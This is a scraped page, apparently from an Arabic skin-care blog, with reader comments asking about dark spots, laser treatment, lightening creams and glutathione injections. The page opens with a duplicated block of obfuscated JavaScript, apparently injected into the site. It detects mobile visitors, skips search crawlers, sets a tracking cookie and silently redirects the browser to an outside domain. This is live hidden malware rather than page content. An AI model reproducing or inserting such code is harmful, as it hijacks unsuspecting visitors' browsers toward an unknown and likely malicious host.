)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments 13

 1. كان عندى اسمرار حوالين الفم و جبت كريم من الصيدليه اسمه tritspot للبقع الداكنة .. مع اول مره احطة عمل حرقان و صحيت لقيت حوالين الفم مقشر .. و الاحمرار قلب سمار اكتر من الاول .. اعمل ايه ؟

 2. عندي بقع في وجهي بحجم قطعه النقود دانه وقمت بعمل جلسات ليزر لها ولكن لم تختفي تماما بل مازال لها أثر في وجهي وقد وصف لي الطبيب كريم elega بعد الإنتهاء من جلسات الليزر وبقالي فتره 11 يوم استخدمه اريد ان اعرف الفتره التي يمكنني أن استخدام فيها الكريم وماهو الحل الأمثل للتخلص من هذه البقع مع العلم ان هذه البقع هي آثار حرق منذ 6اشهر

 3. لو سمحتى دكتوره انا استعملت تركيبه 4فى الميه تفتيح الابط ومكنش عندى اى غامقن فى الصدر كان عندى حبوب استعملت تركيبه بين صدرى بوظت صدرى اعمل ايه كشفت كتير

 4. انا سمره لون خمري نبي شي يفتح البشره والجسم خلال شهر او شهر ونص لانه فرحي قريب الله يخليك ساعديني

 5. لو سمحتى يادكتورة انا وشى جزء منه حصله له حرق كيمايئى وطبعا لون الجلد اغمق من الجلد السليم وداه بقاله شهر هل فى حل

 6. لو سمحتى يا دكتوره كنت عايزه أسأل عن حقن الجلوتاثيون لتفتيح الجسم ينفع لطفل عنده سنتين

 7. حلو جدا بس انا عايزة اعرف جلسات التفتيح ديه النتيجه دائمه ولا بيرجع تانى لون الجلد يغمق

 8. سلام عليكم دكتورة
  انا عملت ليزر للبشرة لان بشرتي تسمر غير لون جسمي وبدأ يتغير وبعد الليزر استخدمت الكريمات كما وضح الدكتور وبعد فترة رجعت بشرتي كما هي جزء اسمر وجزء فاتح
  ماهو الحل لبشرتي

 9. بشرتي دهنية واحتاح للنظارة وتغيير لونها هناك بقع في وجهي مع اثار لحبوب سابقة شكرا”لكي على نصائحكي حبيبتي

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *